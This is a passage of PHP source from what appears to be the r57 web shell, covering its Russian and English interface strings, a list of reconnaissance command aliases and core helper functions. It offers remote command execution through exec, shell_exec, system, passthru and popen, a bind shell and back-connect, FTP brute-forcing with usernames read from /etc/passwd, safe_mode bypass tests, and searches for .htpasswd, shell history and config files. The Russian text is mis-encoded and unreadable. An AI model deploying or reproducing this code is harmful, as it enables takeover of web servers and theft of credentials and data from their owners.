783 'ru_butt5' =>'úÁÐÕÓÔÉÔØ',
784 'ru_text28'=>'òÁÂÏÔÁ × safe_mode',
785 'ru_text29'=>'äÏÓÔÕÐ ÚÁÐÒÅÝÅÎ',
786 'ru_butt6' =>'óÍÅÎÉÔØ',
787 'ru_text30'=>'ðÒÏÓÍÏÔÒ ÆÁÊÌÁ',
788 'ru_butt7' =>'÷Ù×ÅÓÔÉ',
789 'ru_text31'=>'æÁÊÌ ÎÅ ÎÁÊÄÅÎ',
790 'ru_text32'=>'÷ÙÐÏÌÎÅÎÉÅ PHP ËÏÄÁ',
791 'ru_text33'=>'ðÒÏ×ÅÒËÁ ×ÏÚÍÏÖÎÏÓÔÉ ÏÂÈÏÄÁ ÏÇÒÁÎÉÞÅÎÉÊ open_basedir ÞÅÒÅÚ ÆÕÎËÃÉÉ cURL',
792 'ru_butt8' =>'ðÒÏ×ÅÒÉÔØ',
793 'ru_text34'=>'ðÒÏ×ÅÒËÁ ×ÏÚÍÏÖÎÏÓÔÉ ÏÂÈÏÄÁ ÏÇÒÁÎÉÞÅÎÉÊ safe_mode ÞÅÒÅÚ ÆÕÎËÃÉÀ include',
794 'ru_text35'=>'ðÒÏ×ÅÒËÁ ×ÏÚÍÏÖÎÏÓÔÉ ÏÂÈÏÄÁ ÏÇÒÁÎÉÞÅÎÉÊ safe_mode ÞÅÒÅÚ ÚÁÇÒÕÚËÕ ÆÁÊÌÁ × mysql',
795 'ru_text36'=>'âÁÚÁ . ôÁÂÌÉÃÁ',
796 'ru_text37'=>'ìÏÇÉÎ',
797 'ru_text38'=>'ðÁÒÏÌØ',
798 'ru_text39'=>'âÁÚÁ',
799 'ru_text40'=>'äÁÍÐ ÔÁÂÌÉÃÙ ÂÁÚÙ ÄÁÎÎÙÈ',
800 'ru_butt9' =>'äÁÍÐ',
801 'ru_text41'=>'óÏÈÒÁÎÉÔØ × ÆÁÊÌÅ',
802 'ru_text42'=>'òÅÄÁËÔÉÒÏ×ÁÎÉÅ ÆÁÊÌÁ',
803 'ru_text43'=>'òÅÄÁËÔÉÒÏ×ÁÔØ ÆÁÊÌ',
804 'ru_butt10'=>'óÏÈÒÁÎÉÔØ',
805 'ru_butt11'=>'òÅÄÁËÔÉÒÏ×ÁÔØ',
806 'ru_text44'=>'òÅÄÁËÔÉÒÏ×ÁÎÉÅ ÆÁÊÌÁ ÎÅ×ÏÚÍÏÖÎÏ! äÏÓÔÕÐ ÔÏÌØËÏ ÄÌÑ ÞÔÅÎÉÑ!',
807 'ru_text45'=>'æÁÊÌ ÓÏÈÒÁÎÅÎ',
808 'ru_text46'=>'ðÒÏÓÍÏÔÒ phpinfo()',
809 'ru_text47'=>'ðÒÏÓÍÏÔÒ ÎÁÓÔÒÏÅË php.ini',
810 'ru_text48'=>'õÄÁÌÅÎÉÅ ×ÒÅÍÅÎÎÙÈ ÆÁÊÌÏ×',
811 'ru_text49'=>'õÄÁÌÅÎÉÅ ÓËÒÉÐÔÁ Ó ÓÅÒ×ÅÒÁ',
812 'ru_text50'=>'éÎÆÏÒÍÁÃÉÑ Ï ÐÒÏÃÅÓÓÏÒÅ',
813 'ru_text51'=>'éÎÆÏÒÍÁÃÉÑ Ï ÐÁÍÑÔÉ',
814 'ru_text52'=>'ôÅËÓÔ ÄÌÑ ÐÏÉÓËÁ',
815 'ru_text53'=>'éÓËÁÔØ × ÐÁÐËÅ',
816 'ru_text54'=>'ðÏÉÓË ÔÅËÓÔÁ × ÆÁÊÌÁÈ',
817 'ru_butt12'=>'îÁÊÔÉ',
818 'ru_text55'=>'ôÏÌØËÏ × ÆÁÊÌÁÈ',
819 'ru_text56'=>'îÉÞÅÇÏ ÎÅ ÎÁÊÄÅÎÏ',
820 'ru_text57'=>'óÏÚÄÁÔØ/õÄÁÌÉÔØ æÁÊÌ/äÉÒÅËÔÏÒÉÀ',
821 'ru_text58'=>'éÍÑ',
822 'ru_text59'=>'æÁÊÌ',
823 'ru_text60'=>'äÉÒÅËÔÏÒÉÀ',
824 'ru_butt13'=>'óÏÚÄÁÔØ/õÄÁÌÉÔØ',
825 'ru_text61'=>'æÁÊÌ ÓÏÚÄÁÎ',
826 'ru_text62'=>'äÉÒÅËÔÏÒÉÑ ÓÏÚÄÁÎÁ',
827 'ru_text63'=>'æÁÊÌ ÕÄÁÌÅÎ',
828 'ru_text64'=>'äÉÒÅËÔÏÒÉÑ ÕÄÁÌÅÎÁ',
829 'ru_text65'=>'óÏÚÄÁÔØ',
830 'ru_text66'=>'õÄÁÌÉÔØ',
831 'ru_text67'=>'Chown/Chgrp/Chmod',
832 'ru_text68'=>'ëÏÍÁÎÄÁ',
833 'ru_text69'=>'ðÁÒÁÍÅÔÒ1',
834 'ru_text70'=>'ðÁÒÁÍÅÔÒ2',
835 'ru_text71'=>"÷ÔÏÒÏÊ ÐÁÒÁÍÅÔÒ ËÏÍÁÎÄÙ:\r\n- ÄÌÑ CHOWN - ÉÍÑ ÎÏ×ÏÇÏ ÐÏÌØÚÏ×ÁÔÅÌÑ ÉÌÉ ÅÇÏ UID (ÞÉÓÌÏÍ) \r\n- ÄÌÑ ËÏÍÁÎÄÙ CHGRP - ÉÍÑ ÇÒÕÐÐÙ ÉÌÉ GID (ÞÉÓÌÏÍ) \r\n- ÄÌÑ ËÏÍÁÎÄÙ CHMOD - ÃÅÌÏÅ ÞÉÓÌÏ × ×ÏÓØÍÅÒÉÞÎÏÍ ÐÒÅÄÓÔÁ×ÌÅÎÉÉ (ÎÁÐÒÉÍÅÒ 0777)",
836 'ru_text72'=>'ôÅËÓÔ ÄÌÑ ÐÏÉÓËÁ',
837 'ru_text73'=>'éÓËÁÔØ × ÐÁÐËÅ',
838 'ru_text74'=>'éÓËÁÔØ × ÆÁÊÌÁÈ',
839 'ru_text75'=>'* ÍÏÖÎÏ ÉÓÐÏÌØÚÏ×ÁÔØ ÒÅÇÕÌÑÒÎÏÅ ×ÙÒÁÖÅÎÉÅ',
840 'ru_text76'=>'ðÏÉÓË ÔÅËÓÔÁ × ÆÁÊÌÁÈ Ó ÐÏÍÏÝØÀ ÕÔÉÌÉÔÙ find',
841 'ru_text80'=>'ôÉÐ',
842 'ru_text81'=>'óÅÔØ',
843 'ru_text82'=>'âÁÚÙ ÄÁÎÎÙÈ',
844 'ru_text83'=>'÷ÙÐÏÌÎÅÎÉÅ SQL ÚÁÐÒÏÓÁ',
845 'ru_text84'=>'SQL ÚÁÐÒÏÓ',
846 'ru_text85'=>'ðÒÏ×ÅÒËÁ ×ÏÚÍÏÖÎÏÓÔÉ ÏÂÈÏÄÁ ÏÇÒÁÎÉÞÅÎÉÊ safe_mode ÞÅÒÅÚ ×ÙÐÏÌÎÅÎÉÅ ËÏÍÁÎÄ × MSSQL ÓÅÒ×ÅÒÅ',
847 'ru_text86'=>'óËÁÞÉ×ÁÎÉÅ ÆÁÊÌÁ Ó ÓÅÒ×ÅÒÁ',
848 'ru_butt14'=>'óËÁÞÁÔØ',
849 'ru_text87'=>'óËÁÞÉ×ÁÎÉÅ ÆÁÊÌÏ× Ó ÕÄÁÌÅÎÎÏÇÏ ftp-ÓÅÒ×ÅÒÁ',
850 'ru_text88'=>'FTP-ÓÅÒ×ÅÒ:ÐÏÒÔ',
851 'ru_text89'=>'æÁÊÌ ÎÁ ftp ÓÅÒ×ÅÒÅ',
852 'ru_text90'=>'òÅÖÉÍ ÐÅÒÅÄÁÞÉ',
853 'ru_text91'=>'áÒÈÉ×ÉÒÏ×ÁÔØ ×',
854 'ru_text92'=>'ÂÅÚ ÁÒÈÉ×ÁÃÉÉ',
855 'ru_text93'=>'FTP',
856 'ru_text94'=>'FTP-ÂÒÕÔÆÏÒÓ',
857 'ru_text95'=>'óÐÉÓÏË ÐÏÌØÚÏ×ÁÔÅÌÅÊ',
858 'ru_text96'=>'îÅ ÕÄÁÌÏÓØ ÐÏÌÕÞÉÔØ ÓÐÉÓÏË ÐÏÌØÚÏ×ÁÔÅÌÅÊ',
859 'ru_text97'=>'ðÒÏ×ÅÒÅÎÏ ËÏÍÂÉÎÁÃÉÊ: ',
860 'ru_text98'=>'õÄÁÞÎÙÈ ÐÏÄËÌÀÞÅÎÉÊ: ',
861 'ru_text99'=>'* × ËÁÞÅÓÔ×Å ÌÏÇÉÎÁ É ÐÁÒÏÌÑ ÉÓÐÏÌØÚÕÅÔÓÑ ÉÍÑ ÐÏÌØÚÏ×ÁÔÅÌÑ ÉÚ /etc/passwd',
862 'ru_text100'=>'ïÔÐÒÁ×ËÁ ÆÁÊÌÏ× ÎÁ ÕÄÁÌÅÎÎÙÊ ÆÔÐ ÓÅÒ×ÅÒ',
863 'ru_text101'=>'éÓÐÏÌØÚÏ×ÁÔØ ÔÁËÖÅ ÐÅÒÅ×ÅÒÎÕÔÏÅ (user -> resu) ÉÍÑ ÐÏÌØÚÏ×ÁÔÅÌÑ × ËÁÞÅÓÔ×Å ÐÁÒÏÌÑ',
864 'ru_text102'=>'ðÏÞÔÁ',
865 'ru_text103'=>'ïÔÐÒÁ×ËÁ ÐÉÓØÍÁ',
866 'ru_text104'=>'ïÔÐÒÁ×ËÁ ÆÁÊÌÁ ÎÁ ÐÏÞÔÏ×ÙÊ ÑÝÉË',
867 'ru_text105'=>'ëÏÍÕ',
868 'ru_text106'=>'ïÔ',
869 'ru_text107'=>'ôÅÍÁ',
870 'ru_butt15'=>'ïÔÐÒÁ×ÉÔØ',
871 'ru_text108'=>'ôÅËÓÔ ÐÉÓØÍÁ',
872 'ru_text109'=>'ó×ÅÒÎÕÔØ',
873 'ru_text110'=>'òÁÚ×ÅÒÎÕÔØ',
874 'ru_text111'=>'SQL-óÅÒ×ÅÒ : ÐÏÒÔ',
875 'ru_text112'=>'ðÒÏ×ÅÒËÁ ×ÏÚÍÏÖÎÏÓÔÉ ÏÂÈÏÄÁ ÏÇÒÁÎÉÞÅÎÉÊ safe_mode ÞÅÒÅÚ ÉÓÐÏÌØÚÏ×ÁÎÉÅ ÆÕÎËÃÉÉ mb_send_mail',
876 'ru_text113'=>'ðÒÏ×ÅÒËÁ ×ÏÚÍÏÖÎÏÓÔÉ ÏÂÈÏÄÁ ÏÇÒÁÎÉÞÅÎÉÊ safe_mode, ÐÒÏÓÍÏÔÒ ÌÉÓÔÉÎÇÁ ÄÉÒÅËÔÏÒÉÊ Ó ÉÓÐÏÌØÚÏ×ÁÎÉÅÍ imap_list',
877 'ru_text114'=>'ðÒÏ×ÅÒËÁ ×ÏÚÍÏÖÎÏÓÔÉ ÏÂÈÏÄÁ ÏÇÒÁÎÉÞÅÎÉÊ safe_mode, ÐÒÏÓÍÏÔÒ ÓÏÄÅÒÖÉÍÏÇÏ ÆÁÊÌÁ Ó ÉÓÐÏÌØÚÏ×ÁÎÉÅÍ imap_body',
878 'ru_text115'=>'ðÒÏ×ÅÒËÁ ×ÏÚÍÏÖÎÏÓÔÉ ÏÂÈÏÄÁ ÏÇÒÁÎÉÞÅÎÉÊ safe_mode, ËÏÐÉÒÏ×ÁÎÉÅ ÆÁÊÌÏ× Ó compress.zlib:// × copy()',
879 'ru_text116'=>'ëÏÐÉÒÏ×ÁÔØ ÆÁÊÌ',
880 'ru_text117'=>'×',
881 'ru_text118'=>'æÁÊÌ ÓËÏÐÉÒÏ×ÁÎ',
882 'ru_text119'=>'îÅ ÕÄÁÌÏÓØ ÓËÏÐÉÒÏ×ÁÔØ ÆÁÊÌ',
883 'ru_err0'=>'ïÛÉÂËÁ! îÅ ÍÏÇÕ ÚÁÐÉÓÁÔØ × ÆÁÊÌ ',
884 'ru_err1'=>'ïÛÉÂËÁ! îÅ ÍÏÇÕ ÐÒÏÞÉÔÁÔØ ÆÁÊÌ ',
885 'ru_err2'=>'ïÛÉÂËÁ! îÅ ÕÄÁÌÏÓØ ÓÏÚÄÁÔØ ',
886 'ru_err3'=>'ïÛÉÂËÁ! îÅ ÕÄÁÌÏÓØ ÐÏÄËÌÀÞÉÔØÓÑ Ë ftp ÓÅÒ×ÅÒÕ',
887 'ru_err4'=>'ïÛÉÂËÁ Á×ÔÏÒÉÚÁÃÉÉ ÎÁ ftp ÓÅÒ×ÅÒÅ',
888 'ru_err5'=>'ïÛÉÂËÁ! îÅ ÕÄÁÌÏÓØ ÐÏÍÅÎÑÔØ ÄÉÒÅËÔÏÒÉÀ ÎÁ ftp ÓÅÒ×ÅÒÅ',
889 'ru_err6'=>'ïÛÉÂËÁ! îÅ ÕÄÁÌÏÓØ ÏÔÐÒÁ×ÉÔØ ÐÉÓØÍÏ',
890 'ru_err7'=>'ðÉÓØÍÏ ÏÔÐÒÁ×ÌÅÎÏ',
891 /* --------------------------------------------------------------- */
892 'eng_text1' =>'Executed command',
893 'eng_text2' =>'Execute command on server',
894 'eng_text3' =>'Run command',
895 'eng_text4' =>'Work directory',
896 'eng_text5' =>'Upload files on server',
897 'eng_text6' =>'Local file',
898 'eng_text7' =>'Aliases',
899 'eng_text8' =>'Select alias',
900 'eng_butt1' =>'Execute',
901 'eng_butt2' =>'Upload',
902 'eng_text9' =>'Bind port to /bin/bash',
903 'eng_text10'=>'Port',
904 'eng_text11'=>'Password for access',
905 'eng_butt3' =>'Bind',
906 'eng_text12'=>'back-connect',
907 'eng_text13'=>'IP',
908 'eng_text14'=>'Port',
909 'eng_butt4' =>'Connect',
910 'eng_text15'=>'Upload files from remote server',
911 'eng_text16'=>'With',
912 'eng_text17'=>'Remote file',
913 'eng_text18'=>'Local file',
914 'eng_text19'=>'Exploits',
915 'eng_text20'=>'Use',
916 'eng_text21'=>' New name',
917 'eng_text22'=>'datapipe',
918 'eng_text23'=>'Local port',
919 'eng_text24'=>'Remote host',
920 'eng_text25'=>'Remote port',
921 'eng_text26'=>'Use',
922 'eng_butt5' =>'Run',
923 'eng_text28'=>'Work in safe_mode',
924 'eng_text29'=>'ACCESS DENIED',
925 'eng_butt6' =>'Change',
926 'eng_text30'=>'Cat file',
927 'eng_butt7' =>'Show',
928 'eng_text31'=>'File not found',
929 'eng_text32'=>'Eval PHP code',
930 'eng_text33'=>'Test bypass open_basedir with cURL functions',
931 'eng_butt8' =>'Test',
932 'eng_text34'=>'Test bypass safe_mode with include function',
933 'eng_text35'=>'Test bypass safe_mode with load file in mysql',
934 'eng_text36'=>'Database . Table',
935 'eng_text37'=>'Login',
936 'eng_text38'=>'Password',
937 'eng_text39'=>'Database',
938 'eng_text40'=>'Dump database table',
939 'eng_butt9' =>'Dump',
940 'eng_text41'=>'Save dump in file',
941 'eng_text42'=>'Edit files',
942 'eng_text43'=>'File for edit',
943 'eng_butt10'=>'Save',
944 'eng_text44'=>'Can\'t edit file! Only read access!',
945 'eng_text45'=>'File saved',
946 'eng_text46'=>'Show phpinfo()',
947 'eng_text47'=>'Show variables from php.ini',
948 'eng_text48'=>'Delete temp files',
949 'eng_butt11'=>'Edit file',
950 'eng_text49'=>'Delete script from server',
951 'eng_text50'=>'View cpu info',
952 'eng_text51'=>'View memory info',
953 'eng_text52'=>'Find text',
954 'eng_text53'=>'In dirs',
955 'eng_text54'=>'Find text in files',
956 'eng_butt12'=>'Find',
957 'eng_text55'=>'Only in files',
958 'eng_text56'=>'Nothing :(',
959 'eng_text57'=>'Create/Delete File/Dir',
960 'eng_text58'=>'name',
961 'eng_text59'=>'file',
962 'eng_text60'=>'dir',
963 'eng_butt13'=>'Create/Delete',
964 'eng_text61'=>'File created',
965 'eng_text62'=>'Dir created',
966 'eng_text63'=>'File deleted',
967 'eng_text64'=>'Dir deleted',
968 'eng_text65'=>'Create',
969 'eng_text66'=>'Delete',
970 'eng_text67'=>'Chown/Chgrp/Chmod',
971 'eng_text68'=>'Command',
972 'eng_text69'=>'param1',
973 'eng_text70'=>'param2',
974 'eng_text71'=>"Second commands param is:\r\n- for CHOWN - name of new owner or UID\r\n- for CHGRP - group name or GID\r\n- for CHMOD - 0777, 0755...",
975 'eng_text72'=>'Text for find',
976 'eng_text73'=>'Find in folder',
977 'eng_text74'=>'Find in files',
978 'eng_text75'=>'* you can use regexp',
979 'eng_text76'=>'Search text in files via find',
980 'eng_text80'=>'Type',
981 'eng_text81'=>'Net',
982 'eng_text82'=>'Databases',
983 'eng_text83'=>'Run SQL query',
984 'eng_text84'=>'SQL query',
985 'eng_text85'=>'Test bypass safe_mode with commands execute via MSSQL server',
986 'eng_text86'=>'Download files from server',
987 'eng_butt14'=>'Download',
988 'eng_text87'=>'Download files from remote ftp-server',
989 'eng_text88'=>'FTP-server:port',
990 'eng_text89'=>'File on ftp',
991 'eng_text90'=>'Transfer mode',
992 'eng_text91'=>'Archivation',
993 'eng_text92'=>'without archivation',
994 'eng_text93'=>'FTP',
995 'eng_text94'=>'FTP-bruteforce',
996 'eng_text95'=>'Users list',
997 'eng_text96'=>'Can\'t get users list',
998 'eng_text97'=>'checked: ',
999 'eng_text98'=>'success: ',
1000 'eng_text99'=>'* use username from /etc/passwd for ftp login and password',
1001 'eng_text100'=>'Send file to remote ftp server',
1002 'eng_text101'=>'Use reverse (user -> resu) login for password',
1003 'eng_text102'=>'Mail',
1004 'eng_text103'=>'Send email',
1005 'eng_text104'=>'Send file to email',
1006 'eng_text105'=>'To',
1007 'eng_text106'=>'From',
1008 'eng_text107'=>'Subj',
1009 'eng_butt15'=>'Send',
1010 'eng_text108'=>'Mail',
1011 'eng_text109'=>'Hide',
1012 'eng_text110'=>'Show',
1013 'eng_text111'=>'SQL-Server : Port',
1014 'eng_text112'=>'Test bypass safe_mode with function mb_send_mail',
1015 'eng_text113'=>'Test bypass safe_mode, view dir list via imap_list',
1016 'eng_text114'=>'Test bypass safe_mode, view file contest via imap_body',
1017 'eng_text115'=>'Test bypass safe_mode, copy file via compress.zlib:// in function copy()',
1018 'eng_text116'=>'Copy from',
1019 'eng_text117'=>'to',
1020 'eng_text118'=>'File copied',
1021 'eng_text119'=>'Cant copy file',
1022 'eng_err0'=>'Error! Can\'t write in file ',
1023 'eng_err1'=>'Error! Can\'t read file ',
1024 'eng_err2'=>'Error! Can\'t create ',
1025 'eng_err3'=>'Error! Can\'t connect to ftp',
1026 'eng_err4'=>'Error! Can\'t login on ftp server',
1027 'eng_err5'=>'Error! Can\'t change dir on ftp',
1028 'eng_err6'=>'Error! Can\'t sent mail',
1029 'eng_err7'=>'Mail send',
1030 );
1031 /*
1032 áÌÉÁÓÙ ËÏÍÁÎÄ
1033 ðÏÚ×ÏÌÑÀÔ ÉÚÂÅÖÁÔØ ÍÎÏÇÏËÒÁÔÎÏÇÏ ÎÁÂÏÒÁ ÏÄÎÉÈ É ÔÅÈ-ÖÅ ËÏÍÁÎÄ. ( óÄÅÌÁÎÏ ÂÌÁÇÏÄÁÒÑ ÍÏÅÊ ÐÒÉÒÏÄÎÏÊ ÌÅÎÉ )
1034 ÷Ù ÍÏÖÅÔÅ ÓÁÍÉ ÄÏÂÁ×ÌÑÔØ ÉÌÉ ÉÚÍÅÎÑÔØ ËÏÍÁÎÄÙ.
1035 */
1036 $aliases=array(
1037 'find suid files'=>'find / -type f -perm -04000 -ls',
1038 'find suid files in current dir'=>'find . -type f -perm -04000 -ls',
1039 'find sgid files'=>'find / -type f -perm -02000 -ls',
1040 'find sgid files in current dir'=>'find . -type f -perm -02000 -ls',
1041 'find config.inc.php files'=>'find / -type f -name config.inc.php',
1042 'find config.inc.php files in current dir'=>'find . -type f -name config.inc.php',
1043 'find config* files'=>'find / -type f -name "config*"',
1044 'find config* files in current dir'=>'find . -type f -name "config*"',
1045 'find all writable files'=>'find / -type f -perm -2 -ls',
1046 'find all writable files in current dir'=>'find . -type f -perm -2 -ls',
1047 'find all writable directories'=>'find / -type d -perm -2 -ls',
1048 'find all writable directories in current dir'=>'find . -type d -perm -2 -ls',
1049 'find all writable directories and files'=>'find / -perm -2 -ls',
1050 'find all writable directories and files in current dir'=>'find . -perm -2 -ls',
1051 'find all service.pwd files'=>'find / -type f -name service.pwd',
1052 'find service.pwd files in current dir'=>'find . -type f -name service.pwd',
1053 'find all .htpasswd files'=>'find / -type f -name .htpasswd',
1054 'find .htpasswd files in current dir'=>'find . -type f -name .htpasswd',
1055 'find all .bash_history files'=>'find / -type f -name .bash_history',
1056 'find .bash_history files in current dir'=>'find . -type f -name .bash_history',
1057 'find all .mysql_history files'=>'find / -type f -name .mysql_history',
1058 'find .mysql_history files in current dir'=>'find . -type f -name .mysql_history',
1059 'find all .fetchmailrc files'=>'find / -type f -name .fetchmailrc',
1060 'find .fetchmailrc files in current dir'=>'find . -type f -name .fetchmailrc',
1061 'list file attributes on a Linux second extended file system'=>'lsattr -va',
1062 'show opened ports'=>'netstat -an | grep -i listen',
1063 '----------------------------------------------------------------------------------------------------'=>'ls -la'
1064 );
1065 $table_up1 = "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b><div align=center>:: ";
1066 $table_up2 = " ::</div></b></font></td></tr><tr><td>";
1067 $table_up3 = "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc>";
1068 $table_end1 = "</td></tr>";
1069 $arrow = " <font face=Webdings color=gray>4</font>";
1070 $lb = "<font color=black>[</font>";
1071 $rb = "<font color=black>]</font>";
1072 $font = "<font face=Verdana size=-2>";
1073 $ts = "<table class=table1 width=100% align=center>";
1074 $te = "</table>";
1075 $fs = "<form name=form method=POST>";
1076 $fe = "</form>";
1077
1078 if(isset($_GET['users']))
1079 {
1080 if(!$users=get_users()) { echo "<center><font face=Verdana size=-2 color=red>".$lang[$language.'_text96']."</font></center>"; }
1081 else
1082 {
1083 echo '<center>';
1084 foreach($users as $user) { echo $user."<br>"; }
1085 echo '</center>';
1086 }
1087 echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die();
1088 }
1089
1090 if (!empty($_POST['dir'])) { @chdir($_POST['dir']); }
1091 $dir = @getcwd();
1092 $unix = 0;
1093 if(strlen($dir)>1 && $dir[1]==":") $unix=0; else $unix=1;
1094 if(empty($dir))
1095 {
1096 $os = getenv('OS');
1097 if(empty($os)){ $os = php_uname(); }
1098 if(empty($os)){ $os ="-"; $unix=1; }
1099 else
1100 {
1101 if(@eregi("^win",$os)) { $unix = 0; }
1102 else { $unix = 1; }
1103 }
1104 }
1105 if(!empty($_POST['s_dir']) && !empty($_POST['s_text']) && !empty($_POST['cmd']) && $_POST['cmd'] == "search_text")
1106 {
1107 echo $head;
1108 if(!empty($_POST['s_mask']) && !empty($_POST['m'])) { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text'],$_POST['s_mask']); }
1109 else { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text']); }
1110 $sr->SearchText(0,0);
1111 $res = $sr->GetResultFiles();
1112 $found = $sr->GetMatchesCount();
1113 $titles = $sr->GetTitles();
1114 $r = "";
1115 if($found > 0)
1116 {
1117 $r .= "<TABLE width=100%>";
1118 foreach($res as $file=>$v)
1119 {
1120 $r .= "<TR>";
1121 $r .= "<TD colspan=2><font face=Verdana size=-2><b>".ws(3);
1122 $r .= (!$unix)? str_replace("/","\\",$file) : $file;
1123 $r .= "</b></font></ TD>";
1124 $r .= "</TR>";
1125 foreach($v as $a=>$b)
1126 {
1127 $r .= "<TR>";
1128 $r .= "<TD align=center><B><font face=Verdana size=-2>".$a."</font></B></TD>";
1129 $r .= "<TD><font face=Verdana size=-2>".ws(2).$b."</font></TD>";
1130 $r .= "</TR>\n";
1131 }
1132 }
1133 $r .= "</TABLE>";
1134 echo $r;
1135 }
1136 else
1137 {
1138 echo "<P align=center><B><font face=Verdana size=-2>".$lang[$language.'_text56']."</B></font></P>";
1139 }
1140 echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
1141 die();
1142 }
1143 if(!$safe_mode && strpos(ex("echo abcr57"),"r57")!=3) { $safe_mode = 1; }
1144 $SERVER_SOFTWARE = getenv('SERVER_SOFTWARE');
1145 if(empty($SERVER_SOFTWARE)){ $SERVER_SOFTWARE = "-"; }
1146 function ws($i)
1147 {
1148 return @str_repeat(" ",$i);
1149 }
1150 function ex($cfe)
1151 {
1152 $res = '';
1153 if (!empty($cfe))
1154 {
1155 if(function_exists('exec'))
1156 {
1157 @exec($cfe,$res);
1158 $res = join("\n",$res);
1159 }
1160 elseif(function_exists('shell_exec'))
1161 {
1162 $res = @shell_exec($cfe);
1163 }
1164 elseif(function_exists('system'))
1165 {
1166 @ob_start();
1167 @system($cfe);
1168 $res = @ob_get_contents();
1169 @ob_end_clean();
1170 }
1171 elseif(function_exists('passthru'))
1172 {
1173 @ob_start();
1174 @passthru($cfe);
1175 $res = @ob_get_contents();
1176 @ob_end_clean();
1177 }
1178 elseif(@is_resource($f = @popen($cfe,"r")))
1179 {
1180 $res = "";
1181 while(!@feof($f)) { $res .= @fread($f,1024); }
1182 @pclose($f);
1183 }
1184 }
1185 return $res;
1186 }
1187 function get_users()
1188 {
1189 $users = array();
1190 $rows=file('/etc/passwd');
1191 if(!$rows) return 0;
1192 foreach ($rows as $string)
1193 {
1194 $user = @explode(":",$string);
1195 if(substr($string,0,1)!='#') array_push($users,$user[0]);
1196 }
1197 return $users;
1198 }
1199 function err($n,$txt='')
1200 {
1201 echo '<table width=100% cellpadding=0 cellspacing=0><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>';
1202 echo $GLOBALS['lang'][$GLOBALS['language'].'_err'.$n];
1203 if(!empty($txt)) { echo " $txt"; }
1204 echo '</b></div></font></td></tr></table>';
1205 return null;
1206 }
1207 function perms($mode)
1208 {
1209 if (!$GLOBALS['unix']) return 0;
1210 if( $mode & 0x1000 ) { $type='p'; }
1211 else if( $mode & 0x2000 ) { $type='c'; }
1212 else if( $mode & 0x4000 ) { $type='d'; }
1213 else if( $mode & 0x6000 ) { $type='b'; }
1214 else if( $mode & 0x8000 ) { $type='-'; }
1215 else if( $mode & 0xA000 ) { $type='l'; }
1216 else if( $mode & 0xC000 ) { $type='s'; }
1217 else $type='u';
1218 $owner["read"] = ($mode & 00400) ? 'r' : '-';
1219 $owner["write"] = ($mode & 00200) ? 'w' : '-';
1220 $owner["execute"] = ($mode & 00100) ? 'x' : '-';
1221 $group["read"] = ($mode & 00040) ? 'r' : '-';
1222 $group["write"] = ($mode & 00020) ? 'w' : '-';
1223 $group["execute"] = ($mode & 00010) ? 'x' : '-';
1224 $world["read"] = ($mode & 00004) ? 'r' : '-';
1225 $world["write"] = ($mode & 00002) ? 'w' : '-';
1226 $world["execute"] = ($mode & 00001) ? 'x' : '-';
1227 if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S';
1228 if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S';
1229 if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T';
1230 $s=sprintf("%1s", $type);
1231 $s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']);
1232 $s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']);
1233 $s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']);
1234 return trim($s);
1235 }
1236 function in($type,$name,$size,$value,$checked=0)
1237 {
1238 $ret = "<input type=".$type." name=".$name." ";
1239 if($size != 0) { $ret .= "size=".$size." "; }
1240 $ret .= "value=\"".$value."\"";
1241 if($checked) $ret .= " checked";
1242 return $ret.">";
1243 }
1244 function which($pr)
1245 {
1246 $path = ex("which $pr");
1247 if(!empty($path)) { return $path; } else { return $pr; }
1248 }
1249 function cf($fname,$text)
1250 {
1251 $w_file=@fopen($fname,"w") or err(0);
1252 if($w_file)
1253 {
1254 @fputs($w_file,@base64_decode($text));
1255 @fclose($w_file);
1256 }
1257 }
1258 function sr($l,$t1,$t2)
1259 {
1260 return "<tr class=tr1><td class=td1 width=".$l."% align=right>".$t1."</td><td class=td1 align=left>".$t2."</td></tr>";
1261 }
1262 if (!@function_exists("view_size"))
1263 {
1264 function view_size($size)
1265 {
1266 if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";}
1267 elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";}
1268 elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";}
1269 else {$size = $size . " B";}
1270 return $size;
1271 }
1272 }
1273 function DirFilesR($dir,$types='')
1274 {
1275 $files = Array();
1276 if(($handle = @opendir($dir)))
1277 {
1278 while (false !== ($file = @readdir($handle)))
1279 {
1280 if ($file != "." && $file != "..")
1281 {
1282 if(@is_dir($dir."/".$file))
1283 $files = @array_merge($files,DirFilesR($dir."/".$file,$types));
1284 else
1285 {
1286 $pos = @strrpos($file,".");
1287 $ext = @substr($file,$pos,@strlen($file)-$pos);
1288 if($types)
1289 {
1290 if(@in_array($ext,explode(';',$types)))
1291 $files[] = $dir."/".$file;
1292 }
1293 else
1294 $files[] = $dir."/".$file;
1295 }
1296 }
1297 }
1298 @closedir($handle);
1299 }
1300 return $files;
1301 }
1302 class SearchResult
1303 {
1304 var $text;
1305 var $FilesToSearch;
1306 var $ResultFiles;
1307 var $FilesTotal;
1308 var $MatchesCount;
1309 var $FileMatschesCount;
1310 var $TimeStart;
1311 var $TimeTotal;
1312 var $titles;
1313 function SearchResult($dir,$text,$filter='')
1314 {
1315 $dirs = @explode(";",$dir);
1316 $this->FilesToSearch = Array();
1317 for($a=0;$a<count($dirs);$a++)
1318 $this->FilesToSearch = @array_merge($this->FilesToSearch,DirFilesR($dirs[$a],$filter));
1319 $this->text = $text;
1320 $this->FilesTotal = @count($this->FilesToSearch);
1321 $this->TimeStart = getmicrotime();
1322 $this->MatchesCount = 0;
